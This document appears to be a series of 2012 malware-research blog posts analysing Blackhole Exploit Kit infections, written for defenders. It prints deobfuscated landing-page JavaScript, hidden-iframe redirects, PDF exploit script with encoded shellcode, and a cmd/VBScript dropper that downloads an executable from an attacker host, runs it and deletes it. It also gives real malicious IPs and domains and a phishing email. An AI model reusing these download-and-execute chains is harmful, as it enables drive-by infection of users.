There is a step by step manual deobfuscation here:-->>[PASTEBIN]which can be used as reference for patching many automation.  While tracing the infection code of PluginDetect with browser's logic,  we will explain only 3 infection routes which can be simulated accordingly.  (by the time I got this hint, many objects couldn't be reached.. lack of evidence)  1. Java Exploitation   1.1. Updating/install the java old update 1.6.0/vulnerable version...    (I really hope the below url or related urls at sun.com to be deleted soon!)  ＜object 
 classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" 
 codebase="h00p://java.sun.com/update/1.6.0/jinstall-6u60-windows-i586.cab#Version=6,0,0,0" 
 WIDTH="200" HEIGHT="200" ＞
   1.2. After your browser is having vulnerable java installed, it downloaded -    malicious java zpplet w/zeroday PoC exploiting arbitary exec shellcode to download -    other evil binary.. ＜PARAM NAME="ARCHIVE" VALUE="h00p://THIS-HOST-ADDRESS/links/anybody_miss-knowing.php?teredt=373402380a&teysll=4740&limflyi=cpsn&ixvr=joucpxn"＞
 ＜param name="type" value="application/x-java-applet;version=1.6"＞
   ↑by the time we got the url the applet was not accessible anymore so we     cannot describe more of it.  2. The vector of the infection using MSXML2.XMLHTTP/CVE-2010-2561:   3.1. Opening ActiveXObject + creating 3 objects of:         adodb.stream, Shell.Application, and msxml2.XMLHTTP    3.2. Linked to ./anybody_miss-knowing.php?[specific parameter] to download exploit    3.3. If this exploit works (CVE-2010-2561) will drop you exe (.//..//c175065.exe)    3.4. via ActiveX command ShellExecute will be used to execute the payload         (this shellcode was using the format explained in previous post-->>[URL]   The logs lof the above steps... ActiveXObject: msxml2.xmlhttp
ActiveXObject: acropdf.pdf
[HTTP] URL: x.x.x.x/links/anybody_miss-knowing.php?mkk=373402380a&jiypmeg=3f&eawqt=03370302073706343433&ytejxs=0b000300020002 (Status: 200, Referrer: http://69.194.192.203/links/anybody_miss-knowing.php)
[Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (adodb.stream)
ActiveXObject: adodb.stream
[Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (Shell.Application)
ActiveXObject: shell.application
[Microsoft MDAC RDS.Dataspace ActiveX] CreateObject (msxml2.XMLHTTP)
ActiveXObject: msxml2.xmlhttp
[Microsoft XMLHTTP ActiveX] open('GET', 'x.x.x.x/links/anybody_miss-knowing.php?sby=373402380a&ozitwo=03370302073706343433&udyuxlri=04&gvfvizk=azme&gre=prxm', False)
[Microsoft XMLHTTP ActiveX] send
[Microsoft XMLHTTP ActiveX] Fetching from URL x.x.x.x/links/anybody_miss-knowing.php?sby=373402380a&ozitwo=03370302073706343433&udyuxlri=04&gvfvizk=azme&gre=prxm (method: GET)
[Adodb.Stream ActiveX] open
[Adodb.Stream ActiveX] Write
[Adodb.Stream ActiveX] SaveToFile (.//..//c175065・exe)
[Adodb.Stream ActiveX] Close
[Shell.Application ActiveX] ShellExecute command: .//..//c175065・exe
3. PDF Exploitation - Slight New Changes Detected..    We have good sample of this so we can say much.    The PluginDetect look at your Adobe versions then drops pdf/exploit    But slight changes found compared to prev. code, not using splx() anymore.    Reason? Yes, to avoid detection, and that retarded idea works!    The way this code detects the adobe version is as below (same as before..):    PluginDetect.initScript（）；
   PluginDetect.getVersion（"."）；
   pdfver＝PluginDetect.getVersion（"AdobeReader"）；
   Redirect you the download evil pdf url below (same as before..):  function x（s）
 ｛
   d＝[]；
   for（i＝O；i＜s.length；i＋＋）
   ｛
     k＝（s.charCodeAt（i）-46）.toString（16）；
     if（k.length＝＝1）k＝"O"＋k；
     d.push（k）；
   ｝；
   return d.join（""）；
 ｝
 end_redirect＝function（）
 ｛
 ｝；
 window.onbeforeunload＝function（）
   or depends on the version go to NEW BHEK2 URL with evil IFRAME now;    show_pdf2＝function（src）
   ｛
     var pifr＝document.createElement（'IFRAME'）；
     pifr.setAttribute（'width',1）；
     pifr.setAttribute（'height',1）；
     pifr.setAttribute（'src',src）；
     document.body.appendChild（pifr）
   ｝；
   show_pdf2（window.location＋"?mkk＝"＋x（"ebOf8"）＋"&jiypmeg＝"＋x（"m"）＋"&eawqt＝O337O3O2O737O6343433&ytejxs＝"＋x（pdfver.join（"."）））；
 ｝
   Which was reversed and runs as per below.. 
[iframe redirection] x.x.x.x/links/anybody_miss-knowing.php -> x.x.x.x/links/anybody_miss-knowing.php?mkk=373402380a&jiypmeg=3f&eawqt=03370302073706343433&ytejxs=0b000300020002
   Means the previous pdf version checking used in the BHEK 1.3.2(see below) part     was gone, although the same PluginDetect code base is still in use!    It is understandable since BHEK2 is using longer format url download     w/more parameters..    It's an important evidence to show PluginDetect code was also started to be changed..    Function spl3()｛
  iF (pdFver「O」 ＞ O && pdFver「O」 ＜ 8)｛
    exec7 = O；
    show_pdF('./data/ap1.php?F=F4dFb')
  ｝
  else iF ((pdFver「O」 == 8) || (pdFver「O」 == 9 && pdFver「1」 ＜= 3))｛
    exec7 = O；
    show_pdF('./data/ap2.php')
  ｝
  spl4()
*) There are at least 5 to 6 ways of dropping exploits via this evil plugin    in the sample we grabbed only 3(three) infection traces are detected.  The PDF Exploit Used (The Java Script part below is having new code..) Like described above it has 2(two) PDF exploit used in the logic of plugin detect, in this case both leads to both files with same logic (diff md5)  This PDF has interesting way which wasn't used in previous PDF exploits.. The format is the same, contains three points: javaScript, exploit code & shellcode. Like per pasted below snips: (all code are neutralized/uninfected/useless code..)  Exploits： ＜＜
 /Keywords(3d40401i3d3o3h4244253h463h3q441i…
1l1o1l1o1l1o1l1o1l1o1l1o1l1o1l161f3h463h3q441i443d…
1i463l3h473h42323h42433l3r3q1i443r2r44423l3q3j1c1d…
3d3n1d233o3r48333k3h3h253b2h1l1f4340423d49233o3r48…
3j1i3i423r3p2b3k3d422b3r3g3h1c3f1d234d423h4445423q…
3r3q143b3m1m1c3b2h1l1d4b3b2h1p251b1b233i3r421c3b2h…
292a2929292929292929292929292p29292929292929293548…
3b3o3o1m1f25453q3h433f3d403h1c1b191k1k1b1d233b3o3o…
Shellcode:  /CreationDate(66,83,e4,fc,fc,85,…
,10,83,c3,05,ff,e3,68,6f,6e,00,00,68,75,…
,70,3a,2f,2f,36,39,2e,31,39,34,2e,31,39,…
>>
JavaScript: ＜xfa:script contentType＝'aｐplication/x-javaｓcript'＞
with（event）｛
k＝target["eva"；+"；l"；]；
if（（app.addMenuItem+""）.indexOf（"Me"+"nuItem"）!＝-１）｛a＝target.keywords；｝
｝
s＝""；
z＝a；
for（i＝0；i<；a.length；i+＝2）｛
 s+＝String.fromCharCode（parseInt（z.substr（i,２）,28））；｝
k（s）；
＜/xfa:scｒipt＞
Note: I wrote in previous post about the javascript used in PDF like this one, but the logic of PDF/JS used was changed. Please be noted..  The last part of the shellcode was actually the url lead to the payload.. to be dropped in the users with the uri details below: 0x0184 /phttp://x.x.x.x/links/anybody_miss-knowing.php?cmpspxc=373402380a&jwk=03370302073706343433&ntzziqi=03&gbks=coi&swlmlswl=culvtnu
While the collection of these evil junks we analyzed are: PS: I made a mistake to loose PE payload unsaved by proxy operation, couldn't get  the payload in the attempt I made afterward, was one time shot.. Sorry for not be able to analyze it..  List of VirusTotal of each unique sample w/initial AV detection ratio:FILENAME                  MD5                              DETECT RATIO ------------------------------------------------------------------------  index.html                9f7ea93cfc911305084c16fb3aeb6517 (18 / 42)js.js                     8c53450b115b26d4144eac9d5f11852e ( 0 / 43)anybody_miss-knowing.php  02746b26613d881314d84f3b51d1ad97 ( 3 / 42)acropdf.pdf               b72c668b370cc7271094836ad6180d5e ( 8 / 43)acropdf2.pdf              f78b18ac786199548e647d94da0555ad ( 8 / 43)

↑Conclusion:

New modification / changes in landing page obfuscated code and some recode in PluginDetect of BHEK2 was starting to be seen, the detection ratio of landing page is currently low for this reported case, so I guess they got what they want, at this moment.

Not a new stuff, but I add anyway, the landing page is being covered well by some steps of forwarder and not to be connected directly to the global link like spam, they currently use a simple redirector for it, which passing the correct parameter to the landing pages and only those redirector urls can be found in spam mails.

And, as per announced in everywhere, the payload download links generated from the BHEK2 landing page is changing to be longer, indeed, but as per written in (@kafeine) site, this findings contains more (3 or 4) parameters per request, not as per one or two long strings as per firstly mentioned elsewhere. See below snips(real case sample):

blah.php?mkk=373402380a&jiypmeg=3f&eawqt=03370302073706343433&ytejxs=0b000300020002
blah.php?teredt=373402380a&teysll=4740&limflyi=cpsn&ixvr=joucpxn
blah.php?sby=373402380a&ozitwo=03370302073706343433&udyuxlri=04&gvfvizk=azme&gre=prxm

Morever about those link is, if you have a lead, then be careful of it, since you may only got one chance to grab it. In dealing with BHEK2, better research those infectors by group rather than doing it alone. I lost my payload because of this reason..

Rerference: (The order is unsorted.. No reason..)

1. Contagio: CVE-2012-4681 samples Original (APT) and Blackhole 2.0 (crime)
2. Malware don't need Coffee: Fast look at an infection by a Blackhole Exploit Kit 2.0
3. Trustwave SpiderLabs: Blackhole Exploit Kit v2
4. Malware don't need Coffee: Behind the Captcha or Inside Blackhole Exploit Kit 2.0 - Exploit Kit Administration Panel
5. XyliBox : Blackhole 2.0

Blackhole Previous Versions:

via Xylibox: v1.20, v1,21, v1.23 & Malware don't need Coffee: v.1.25

#MalwareMustDie!

Thứ Tư, 19 tháng 9, 2012

"Geek" Way in Reversing #CVE-2010-1885 Infection via PluginDetect Script/Blackhole EK (85.17.165.22)

12:19

nam tóc xù

Just finished handling local infection case today, behind this case is the beloved blackhole exploit kit. Some WinXP for some 3rd party software compatibility trouble can't install Microsoft's critical patch (MS10-042) properly, this patch is about the infamous (CVE-2010-1885) which is critical vulnerability in MPC::HexToNum function in helpctr.exe (a.k.a. hcp://URL flaw). And these clients accidentally opening a spam mail contains the BHEK infected url (some of you like to say it as "BHEK landing page"), downloading a payload which the installed antivirus software cannot even detect it yet.

That was just happened today and was really made my day. Since the flaw was fixed by microsoft in about 2years ago I never expect to see un-patched systems which still having this flaw, yet it does exist, bunch of it. Surprisingly, since there are some possibility of XP users are also having similar risk so I dare myself to write the reversing of this infection for your information on handling similar case.


The infectors was BHEK of in 85.17.165.22 , looks being up less than 24h 
with reports below here--->>[URL-QUERY-LINK]
The landing page is:  h00p://85.17.165.22/main.php?page=9adab93ef87c3421

And it has the below infection components:
/Gam.jar           EXPL: Java/2012-1723 (go to below explanation)
/data/field.swf    EXPL: SWF/Cve-2011-0611 ---> shellcode --> same payload
/data/ap1.php      EXPL: JS/PDF.PdfCtrl old ver. SAV: AcroPDF.PDF --> shellcode --> same payload
/data/ap2.php      EXPL: JS/PDF.PdfCtrl new ver. SAV: AcroPDF.PDF --> shellcode --> same payload
/w.php?f=f4dfb&e=1 EXPL: EXPL: Java/2012-1723 SAV: Gam.Jar --> Shellcode --> SAV: same payload
/w.php?f=f4dfb&e=2 EXPL: CVE-2010-2561/msxml2.XMLHTTP SAV: .//..//6f9d07d.exe --> same payload
/w.php?f=f4dfb&e=5 EXPL: CVE-2010-1885/HRC vulns SAV: %TEMP%\file.exe
↑see the last line closely, this is the case that I will describe here.  If you deobfs the landing page well, you'll see BHEK plugin detect, just in case, you can see my neutralized deobfs code here: --->>[PASTEBIN] in the line 1790 you will see code like this Function spl4()｛
  try ｛
    For (var i = O, m； i ＜ navigator・plugins・length； i ++ )｛
      var name = navigator・plugins「i」.name；
      iF (name.indexOF('Media Player') !=- 1)｛
        m = document・createElement('IFRAM3')；
        m.setAttribute('src', './data/hhcp.php？c=F4dFb')；
        m.setAttribute('width', O)；
        m.setAttribute('height', O)；
        document・body「'appendChild'」(m)
      ｝
Which will lead you to the downloaded html file at: h00p://85.17.165.22/data/hhcp.php？c=F4dFb
And this file will contain the other obfs code like this: eval can be decoded as per below pic, an iframe contains exploit and - also an execution arbitary command: The format of the malicious iframe is as per below: ＜ifｒame src="xxxxx=＜ｓcript defer＞Run(yyyyy);＜/ｓcript>"＞
//legends:
xxxxx=CVE-2010-1885 PoC strings
yyyyy=executable aribary command
If you compare "xxxxx" with the PoC of CVE-2010-1885 you'll see similarity: ↑here's the PoC link-->http://seclists.org/fulldisclosure/2010/Jun/205 Following, the "yyyyy" is combination of cmd and Windows (Visual Basic) Script commands: cmd /c echo FileName = "%TEMP%\file・exe"＞＞%TEMP%\
 go・vbs&&echo url="http://x・x・x・x/w・php？f=f4dfb&e=5" ＞＞%TEMP%\
 go・vbs&&echo Set objHTTP = CreateObject("MSXML2・XMLHTTP")＞＞%TEMP%\
 go・vbs&&echo Call objHTTP・Open("GET", url, False)＞＞%TEMP%\
 go・vbs&&echo objHTTP・Send＞＞%TEMP%\
 go・vbs&&echo set oStream = createobject("Adodb・Stream")＞＞%TEMP%\
 go・vbs&&echo Const adTypeBinary = 1 ＞＞%TEMP%\
 go・vbs&&echo Const adSaveCreateOverWrite = 2 ＞＞%TEMP%\
 go・vbs&&echo Const adSaveCreateNotExist = 1 ＞＞%TEMP%\
 go・vbs&&echo oStream・type = adTypeBinary ＞＞%TEMP%\
 go・vbs&&echo oStream・open ＞＞%TEMP%\
 go・vbs&&echo oStream・write objHTTP・responseBody＞＞%TEMP%\
 go・vbs&&echo oStream・savetofile FileName, adSaveCreateNotExist ＞＞%TEMP%\
 go・vbs&&echo oStream・close＞＞%TEMP%\
 go・vbs&&echo set oStream = nothing ＞＞%TEMP%\
 go・vbs&&echo Set xml = Nothing ＞＞%TEMP%\
 go・vbs&&echo Set WshShell = CreateObject("WScript・Shell") ＞＞%TEMP%\
 go・vbs&&echo WshShell・Run FileName, 0, True ＞＞%TEMP%\
 go・vbs&&echo Set FSO = CreateObject("Scripting・FileSystemObject") ＞＞%TEMP%\
 go・vbs&&echo FSO・DeleteFile "%TEMP%\go・vbs" ＞＞%TEMP%\
 go・vbs|cscript %TEMP%\
 go・vbs＞nul
(PS: the above code was neutralized and NOT malicious!)
↑Which means: Download file from 85.17.165.22/w・php？f=f4dfb&e=5 & save it in %TEMP%\file.exe, via MSXML2・XMLHTTP stream, and then runs it via WshShell.Run and DELETE  the saved file afterwards. (This was the reason I couldn't get the sample file from infected PC and I had to - extract it out of the memory manually)
The worse part is almost everyone miss this tiny obfuscated file- even in the Virus Total ONLY 3(three) products can detect it: MD5:         5629b24e0faae7b42127df9f592fed48 File size:   5.2 KB ( 5326 bytes ) File name:   hhcp.php@c=f4dfb File type:   HTML Tags:       html cve-2010-1885 exploit Detection:   3 / 43 Analysisdate:2012-09-19 19:36:44 UTC ( 1 時間, 7 分 ago ) URL: ------>>[VIRUS-TOTAL] 
Furthermore the payload looks like this "Fake" Intel Logo: Which runs these both processes: PID MEM        PATH                Event    
216 2007536674 %path%unknown.exe   Global\crypt32LogoffEvent //Stays as process
840 2088831062 %System%svchost.exe //Kicking off svchost
I don't have enough time to do deep analysis of this binary, so a quicky then..  Binary snapshot: 0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 C8 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   A9 0B B2 8A ED 6A DC D9 ED 6A DC D9 ED 6A DC D9    .....j...j...j..
0090   EB 49 D6 D9 E6 6A DC D9 ED 6A DD D9 F3 6A DC D9    .I...j...j...j..
00A0   73 4A FF D9 EC 6A DC D9 B4 49 CF D9 EC 6A DC D9    sJ...j...I...j..
00B0   82 75 D8 D9 EC 6A DC D9 52 69 63 68 ED 6A DC D9    .u...j..Rich.j..
00C0   00 00 00 00 00 00 00 00 50 45 00 00 4C 01 07 00    ........PE..L...
00D0   A8 78 57 50 00 00 00 00 00 00 00 00 E0 00 03 01    .xWP............
Section:
   .text  0x44000(snipped)
   .rdata 0x45000 0x2d84 11776
   .data  0x48000 0xd38 3584
   .adata 0x49000 0x10 512
   .CRT   0x4b000 0x10 512 <--- cryptor pack
   .rsrc  0x4c000 0x1a18 7168 
Entry Point: 0x1e490
Compile Time: 0x505778A8 [Mon Sep 17 19:23:20 2012 UTC]
Packer: unknown
Shortly, some suspicious calls detected while it stays in process..  Below is my adventure in reversing graph, the way it steals so many info - I guess is a variant of ZeuS Trojan or ZeuS/Zbot↓ In the mean time Virus Total can detect this as per below: MD5:       c559573fc5ab9862607e4fa4b2edfc04 File size: 294.0 KB ( 301056 bytes ) File name: unknown.exe File type: Win32 EXE Detection: 19 / 43 Analysis date: 2012-09-19 17:58:31 UTC ( 1 分 ago ) URL:---->>[VIRUS-TOTAL]
The current malware names are: F-Secure                 : Trojan.Generic.KD.731435
Microsoft                : PWS:Win32/Zbot
VIPRE                    : Trojan.Win32.Generic!BT
Symantec                 : Trojan.Gen
TrendMicro               : TROJ_GEN.R42CDII
McAfee-GW-Edition        : PWS-Zbot.vo!a
Fortinet                 : W32/Androm.DW!tr
TrendMicro-HouseCall     : TROJ_GEN.R42CDII
Avast                    : Win32:Trojan-gen
Ikarus                   : Trojan-Spy.Win32.Zbot
GData                    : Trojan.Generic.KD.731435
Kaspersky                : HEUR:Trojan.Win32.Generic
BitDefender              : Trojan.Generic.KD.731435
McAfee                   : PWS-Zbot.gen.ana
Panda                    : Trj/Genetic.gen
AhnLab-V3                : Spyware/Win32.Zbot
AntiVir                  : TR/Injector.air.1
Sophos                   : Mal/EncPk-AGK
Comodo                   : UnclassifiedMalware

The moral of the story is, do not under estimate "every" exploit implemented in the exploit kit. Those exploits are picked up well and are meant for a well-planned infection purpose, even the one you think has the smaller chance to infect. when it hits, you may get yourself an epidemic.

And, to malware analyser/researcher(etc), to understand how infection works by reversing the malicious+exploit code by yourself will change the way you think about handling malware in the future, trust me. You may continue to whatever automation system/tool you use, but at least, for one time, try to figure it out by your ownself! I won't sell you no crap.

#MalwareMustDie!

Thứ Ba, 18 tháng 9, 2012

Monitoring a BlackHole Exploit Kit Services & Infectors (Target: 203.91.113.6)

04:30

nam tóc xù

Monitoring the activity of one blackhole (in short: BHEK) host means spending time on it for days. I picked one positive BHEK host in 203.91.113.6 & stick to it for about a week, this host is quite active as malware infectors, which one of the reason I picked it up.
I think I am careful enough in monitoring it, so I don't think they don't even sense to be monitored, which giving me much time to analyze it. Here's of what I found...

Background

The spam email contains malicious link to this host on Sept 5th was -
making me start to monitor this host. Maybe some of you still remember -
this spam:
From: HM Revenue & Customs [mailto:refund.request@hmrc.gov.uk]
To: xxxx
Sent: 05 September 2012 xx:xx (time was varied)
Subject: Tax Refund Alert - Action Required
How to complain, ask for a review or make an appeal
Review process update
Review process - the first 12 months. Find out more
Claim Your Tax Refund Online
We identified an error in the [link]
↑This spam actually infected users w/Cridex. At that time the domain used was gdeounitrg.com and gsigallery.net  URLQuery data is also showing a long list of reported malware  infectors coming from this host, you can access it here--->>[CLICK]By that list ↑we can see the recent infector domain as per below↓ ｖirtual-geocaching.net
cedarbuiltok.net
thebummwrap.net
afgreenwich.net
bode-sales.net
cat-mails.net
centennialfield.net
blue-lotusgrove.net
dushare.net
If you see each report listed in↑URLQuery by date, you will  know this host never use same domain more than 2 days(MAX).  Since the url listed are landing page, I can assume email malvertising scheme.  Services used: During the initial monitoring time I detected services as per below: 21/tcp   open     ftp
22/tcp   open     ssh
23/tcp   open     telnet
80/tcp   open     http
111/tcp  open     rpcbind
135/tcp  open     msrpc
136/tcp  open     profile
137/tcp  open     netbios-ns
138/tcp  open     netbios-dgm
139/tcp  open     netbios-ssn
389/tcp  open     ldap
636/tcp  open     ldapssl
1025/tcp open     NFS-or-IIS
5000/tcp open     UPnP
5050/tcp open     mmcc
8009/tcp open     ajp13
8080/tcp open     http-proxy
Couple days ago I realized it filtered their previously opened  ports /services, and added some more too, which looks like this now: 21/tcp   open     ftp
22/tcp   open     ssh
23/tcp   open     telnet
80/tcp   open     http
111/tcp  open     rpcbind
135/tcp  filtered msrpc <-----1
136/tcp  filtered profile <-----1
137/tcp  filtered netbios-ns <-----1
138/tcp  filtered netbios-dgm <----1
139/tcp  filtered netbios-ssn <-----1
389/tcp  open     ldap
445/tcp  filtered microsoft-ds <-----1
636/tcp  open     ldapssl
1025/tcp filtered NFS-or-IIS <-------1
1337/tcp filtered waste
3001/tcp filtered nessusd  <-----2
3128/tcp filtered squid-http <-----3
5000/tcp filtered UPnP
5050/tcp open     mmcc
8009/tcp open     ajp13
8080/tcp open     http-proxy <---4
Legend: = Windows services, it was never filtered previously
= nessus scanner daemon service
= squid proxy is running
= http web server
↑It filtered some tcp ports related to the windows services.  To make sure this is still the same Windows server as before - I re-checked the OS fingerprint of it everyday: Resp=Y%DF=Y%W=16A0%ACK=S++%Flags=AS%Ops=MNNTNW
What's with the web services used (port 80 and 8080) Let's see what happened in port 8080 GET / HTTP/1.1
User-Agent: blah
Host: ｖirtual-geocaching.net:8080
Accept: */*

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1 <---- here
Accept-Ranges: bytes
ETag: W/"7777-1279522786000"
Last-Modified: Mon, 19 Jul 2010 06:59:46 GMT
Content-Type: text/html
Content-Length: 7777
Date: Tue, 18 Sep 2012 08:48:01 GMT
While this is what happened in port 80 GET / HTTP/1.1
User-Agent: blah
Host: ｖirtual-geocaching.net
Accept: */*

HTTP/1.1 403 Forbidden
Server: nginx/1.3.3 <--- here
Date: Tue, 18 Sep 2012 08:51:49 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 202
Connection: close
↑So in TCP/8080 we'll see a tomcat & ngnix in TCP/80.  Now we see ngnix, apache, file sharing, telnet, ssh, and ftp server. The filtered ports are: nessus for portscanning, and squid proxy which I probed to be set outbound.  I saw some of blackhole hosts, but never see a guarded one w/heavy  services running like this, morever NFS & LDAP services are also running  too which suggesting us a possibility of records or maybe a C&C activity on it. OK, let's continue with what this BHEK actually does now..  Infector scheme and malwares Consulting to my EK mentor @kafein who kindly guide me in EK infection cases,  what looked like old version of BHEK (1.2.5), since there are some changes - it's possible being upgraded to lastest BHEK v2, so I use a tool on freebsd box to check the infector scheme.  We picked the latest infector structure from urlQuery: ｖirtual-geocaching.net/main.php?page=7de3f5c4200c896e
..And this is what I fetched as samples: ↑all of these evil-mess is what user will get by clicking one infector url above.  File details are as follows: AcroPDF.PDF                    50583375d345fb7a294e26094601699a   18406
field.swf                      d41d8cd98f00b204e9800998ecf8427e       0
Gam.jar                        ab4af9072132f170024a9072e0288459   32171
main.php@page=7de3f5c4200c896e de277f4802b1b59bb2d0f2cafb3137a3   69023
shellcode.sc                   ac157a90724aec74a1de6e0a20d4db0d     466
wpbt0.dll/e88d779.exe          3158bc97bf424fcd905caa22b29767b9  119143
While these are coming through below redirected urls of the infector: /main.php?page=7de3f5c4200c896e <--JS/Obfs Infector
/Gam.jar   <----- exploit java CVE-2012-1723/CVE-2012-4681 w/ shellcode
/data/ap2.php  <----PDF Malware Pdfka/EXP will shellcode
/w.php?f=80f39&e=1 <---- payload EXE (Troj/CRIDEX dropped by JS/HTML shellcode)
/w.php?f=80f39&e=2 <-----payload EXE (troj/CRIDEX dropped by PDF)
/data/hhcp.php?c=80f39  <----0 byte (link for SWF)
/data/field.swf <-- 0 byte supposed to be flash/shockwave
/w.php?f=80f39&e=4 <--- url dropped to PDF shellcode
↑The point of this scheme is to infect user with Trojan/Cridex  The infector scheme is like follows:  Landing page is HTML contains obfuscated JS/Code,  neutralizedsample is here---->>[PASTEBIN]This code is deobfs'ed like this ---->>[PASTEBIN]There you can see the BHEK plugin detection code to exploit your  browser via vulnerable sector, as per below route: Java Object (Gam.jar) --> shellcode1 --> Troj/Cridex(PE)
PDF File (AcroPDF.PDF)--> shellcode2 --> Troj/Cridex(PE)
DOMDocs Msxml2.XMLHTTP --------> Troj/Cridex(PE)
Java Exploit javaplugin.191_40 --> shellcode1 --> Troj/Cridex(PE)
JavaWebStart.isInstalled -->shellcode1 --> Troj/Cridex(PE)
SWF Exploit (field.swf) --> null (at least at this moment..)
Landing page itself/HTML --> shellcode1 --> Troj/Cridex(PE)
The above scheme was recorded in log at my freebsd box below: [ｈ00p] URL: ｈ00p://ｖirtual-geocaching.net/main.php?page=7de3f5c4200c896e (Status: 200, Referrer: None)

[Navigator URL Translation] Gam.jar -->  ｈ00p://ｖirtual-geocaching.net/Gam.jar
[ｈ00p] URL: ｈ00p://ｖirtual-geocaching.net/Gam.jar (Status: 200, Referrer: ｈ00p://ｖirtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving applet Gam.jar

[Window] Eval argument length > 64 (33842)
ActiveXObject: msxml2.xmlｈ00p
ActiveXObject: acropdf.pdf
Unknown ActiveX Object: shockwaveflash.shockwaveflash.15
Unknown ActiveX Object: shockwaveflash.shockwaveflash.14
Unknown ActiveX Object: shockwaveflash.shockwaveflash.13
Unknown ActiveX Object: shockwaveflash.shockwaveflash.12
Unknown ActiveX Object: shockwaveflash.shockwaveflash.11
ActiveXObject: shockwaveflash.shockwaveflash.10

Unknown ActiveX Object: javawebstart.isinstalled.1.9.1.0
Unknown ActiveX Object: javawebstart.isinstalled.1.9.0.0
Unknown ActiveX Object: javawebstart.isinstalled.1.8.1.0
Unknown ActiveX Object: javawebstart.isinstalled.1.8.0.0
ActiveXObject: javawebstart.isinstalled.1.7.1.0
Unknown ActiveX Object: javaplugin.171_40
Unknown ActiveX Object: javaplugin.171_39
Unknown ActiveX Object: javaplugin.171_38
Unknown ActiveX Object: javaplugin.171_37
Unknown ActiveX Object: javaplugin.171_36
Unknown ActiveX Object: javaplugin.171_35
Unknown ActiveX Object: javaplugin.171_34
Unknown ActiveX Object: javaplugin.171_33
Unknown ActiveX Object: javaplugin.171_32
Unknown ActiveX Object: javaplugin.171_31
ActiveXObject: javaplugin.171_30
ActiveXObject: javawebstart.isinstalled.1.7.1.0
[Navigator URL Translation] ./data/ap2.php -->  ｈ00p://ｖirtual-geocaching.net/data/ap2.php
[ｈ00p] URL: ｈ00p://ｖirtual-geocaching.net/data/ap2.php (Status: 200, Referrer: ｈ00p://ｖirtual-geocaching.net/main.php?page=7de3f5c4200c896e)
[Navigator URL Translation] ./data/hhcp.php?c=80f39 -->  ｈ00p://ｖirtual-geocaching.net/data/hhcp.php?c=80f39
[ｈ00p] URL: ｈ00p://ｖirtual-geocaching.net/data/hhcp.php?c=80f39 (Status: 200, Referrer: ｈ00p://ｖirtual-geocaching.net/main.php?page=7de3f5c4200c896e)

ActiveXObject: D27CDB6E-AE6D-11CF-96B8-444553540000
[ｈ00p] URL: ｈ00p://ｖirtual-geocaching.net/w.php?f=80f39&e=1 (Status: 200, Referrer: ｈ00p://ｖirtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving remote content at ｈ00p://ｖirtual-geocaching.net/w.php?f=80f39&e=1 (MD5: 3158bc97bf424fcd905caa22b29767b9)

[Navigator URL Translation] ./data/ap2.php -->  ｈ00p://ｖirtual-geocaching.net/data/ap2.php
[iframe redirection] ｈ00p://ｖirtual-geocaching.net/main.php?page=7de3f5c4200c896e -> ｈ00p://ｖirtual-geocaching.net/data/ap2.php
[ｈ00p] URL: ｈ00p://ｖirtual-geocaching.net/data/ap2.php (Status: 200, Referrer: ｈ00p://ｖirtual-geocaching.net/main.php?page=7de3f5c4200c896e)

[Navigator URL Translation] ./data/hhcp.php?c=80f39 -->  ｈ00p://ｖirtual-geocaching.net/data/hhcp.php?c=80f39
[iframe redirection] ｈ00p://ｖirtual-geocaching.net/main.php?page=7de3f5c4200c896e -> ｈ00p://ｖirtual-geocaching.net/data/hhcp.php?c=80f39
[ｈ00p] URL: ｈ00p://ｖirtual-geocaching.net/data/hhcp.php?c=80f39 (Status: 200, Referrer: ｈ00p://ｖirtual-geocaching.net/main.php?page=7de3f5c4200c896e)

[Navigator URL Translation] data/field.swf -->  ｈ00p://ｖirtual-geocaching.net/data/field.swf
[ｈ00p] URL: ｈ00p://ｖirtual-geocaching.net/data/field.swf (Status: 200, Referrer: ｈ00p://ｖirtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving remote content at data/field.swf (MD5: d41d8cd98f00b204e9800998ecf8427e)

[Navigator URL Translation] data/field.swf -->  ｈ00p://ｖirtual-geocaching.net/data/field.swf
[ｈ00p] URL: ｈ00p://ｖirtual-geocaching.net/data/field.swf (Status: 200, Referrer: ｈ00p://ｖirtual-geocaching.net/main.php?page=7de3f5c4200c896e)
About #shellcode, we found 2 shellcodes, one is the one coded in the landing page, and the other one is coded in PDF file, say, shellcode 1 & 2. The shellcode1 decoded: BOOL VirtualProtectEx (
     HANDLE = 0x298dda60 => none;
     LPCVOID = 0x298dda70 => none;
     DWORD dwSize = 255;
     DWORD flNewProtect = 64;
     PDWORD lpflOldProtectt = 64;
) =  0x1;
HMODULE LoadLibraryA (
     LPCTSTR = 0x298ddad0 => = "urlmon"; //urlmon.dl used
) =  0x7df20000;
DWORD GetTempPathA (
     DWORD nBufferLength = 248;
     LPTSTR = 0x298ddb00 => 
           = "c:\tmp\";
) =  0x7;
HRESULT URLDownloadToFile ( //downloads...
     LPUNKNOWN = 0x28621a40 =>  none;
     LPCTSTR = 0x28621a48 => 
           = "h00p://ｖirtual-geocaching.net/ｗ.php?f=80f39&e=1";
     LPCTSTR = 0x298ddb50 => 
           = "c:\tmp\wpbt0.dll";  // saved here...
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) =  0x0;
UINT WINAPI WinExec (       // execute it here..
     LPCSTR = 0x298ddb70 => 
           = "c:\tmp\wpbt0.dll";
     UINT uCmdShow = 0;
) =  0x20;
UINT WINAPI WinExec (
     LPCSTR = 0x298ddbb0 => 
